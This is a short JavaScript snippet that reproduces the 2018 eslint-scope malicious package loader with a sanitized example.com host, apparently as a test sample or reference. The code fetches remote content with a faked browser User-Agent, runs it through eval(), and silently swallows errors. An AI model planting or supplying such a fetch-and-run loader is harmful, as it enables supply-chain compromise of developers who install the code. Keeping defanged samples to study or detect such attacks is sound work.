// the eslint-escope attack, with the URL altered to avoid triggering antivirus software. // See https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes try { var https = require("https"); https .get( { hostname: "example.com", path: "modified/to/avoid/antivirus", headers: { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0", Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" } }, r => { r.setEncoding("utf8"); r.on("data", c => { eval(c); }); r.on("error", () => {}); } ) .on("error", () => {}); } catch (e) {}